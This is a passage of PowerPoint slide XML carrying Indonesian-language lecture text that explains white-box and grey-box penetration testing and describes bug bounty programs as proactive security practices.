              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> white box)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsultan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mensimulasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kotak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>abu-abu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsultan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengintaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>parsial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsultan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Bug Bounty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Program bug bounty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insentif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hadiah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peneliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>putih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>". Baik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maupun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program bug bounty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbedaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utamanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terletak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>strukturnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>etis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
